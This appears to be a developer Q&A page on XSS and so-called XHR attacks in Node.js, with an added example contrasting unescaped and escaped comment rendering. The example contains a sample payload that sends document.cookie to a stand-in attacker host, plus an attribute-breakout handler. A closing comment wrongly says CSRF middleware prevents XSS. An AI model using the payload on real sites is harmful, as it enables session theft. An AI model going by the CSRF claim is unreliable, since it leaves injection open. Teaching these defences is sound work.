I am developing a Node.js server which will be interacting with a client mobile application. I came across some attacks on the server called XSS and XHR. I came across a module called node-validator which was useful for handling and validating inputs. I need an idea whether XSS and XHR attacks have the same effect and if that module is useful for both. Any idea regarding this will be really helpful.
2 Answers
An XSS attack is also known as a Cross Site Scripting attack. It is when an attacker utilizes an un-sanitized input field to inject JavaScript into an application. A common example would be if an attacker managed to inject JavaScript into a blog post's comments. It would then (if improperly sanitized) execute every time someone views the comment. An example of this type of attack can be read about here.
An XHR attack would just be an extension of the XSS attack, where the injected script makes AJAX calls back to the domain's server.
It is actually rather easy to prevent these types of attacks. By validating your input (stripping out HTML tags) and escaping special characters like ", ', `, etc you can prevent this. I would definitely recommend using an external library for this, as you will likely miss stuff on your own.
Also, this is a similar question which may help you. Sanitizing user input before adding it to the DOM in Javascript
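To make the stored-XSS scenario in the answer above concrete, here is an added example (not code from the original answer or from node-validator) that renders a blog comment once without escaping and once with output escaping of the characters the answer lists (`"`, `'`, `` ` ``) plus `&`, `<` and `>`. The comment object and the attacker payload are constructed for the example; the payload is exactly the "XHR attack" the answer describes, an injected script that makes an XMLHttpRequest carrying the victim's cookie.

```javascript
// Added example, not from the original answer: output-escaping a user comment
// before it is placed into HTML. All inputs below are constructed.

const HTML_ESCAPES = {
  '&': '&amp;', '<': '&lt;', '>': '&gt;',
  '"': '&quot;', "'": '&#39;', '`': '&#96;',
};

// Escape every character that can break out of HTML text or a quoted
// attribute value. One regex pass, so '&' is never double-escaped.
function escapeHtml(str) {
  return String(str).replace(/[&<>"'`]/g, (ch) => HTML_ESCAPES[ch]);
}

// Vulnerable: user-controlled strings are concatenated straight into markup.
function renderCommentUnsafe(comment) {
  return `<div class="comment" data-author="${comment.author}">` +
         `${comment.body}</div>`;
}

// Hardened: the same template, but every untrusted value is escaped at the
// point where it enters HTML (both the attribute and the element body).
function renderCommentSafe(comment) {
  return `<div class="comment" data-author="${escapeHtml(comment.author)}">` +
         `${escapeHtml(comment.body)}</div>`;
}

// Constructed attacker input: the author field breaks out of the attribute
// and adds an event handler; the body carries a script that sends the
// cookie to an attacker-controlled host via XMLHttpRequest.
const attackerComment = {
  author: '" onmouseover="alert(1)',
  body: 'Nice post <script>var x=new XMLHttpRequest();' +
        'x.open("GET","https://attacker.invalid/?c="+document.cookie);' +
        'x.send()</script>',
};

// Crude check used only to show the difference between the two renderings:
// does the resulting markup still contain a live <script> element?
function containsScriptTag(html) {
  return /<script\b/i.test(html);
}

console.log('unsafe:', renderCommentUnsafe(attackerComment));
console.log('safe:  ', renderCommentSafe(attackerComment));
```

Escaping at output time, per context, is the reliable defence; stripping tags from input with a regex tends to miss encodings and attribute-based payloads, which is why the answer's advice to use an existing library (or a template engine that escapes by default) is sound. Note that a comment like `" onmouseover="alert(1)` contains no tag at all, so a tag-stripping filter would pass it through unchanged, while the escaped version above keeps it inside the attribute value.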
If you are using expressjs/connect then there's a "built-in" csrf middleware in connect.
I'm using csrf middleware which prevents XSS and XHR attacks by requiring a token to be submitted to all POST requests. This token is generated by the server on each page request. Does the trick for me. I've tested it out trying to do an attack on my own site from a different server and all requests were blocked because the token is missing. – ChrisRich Jan 10 '15 at 23:53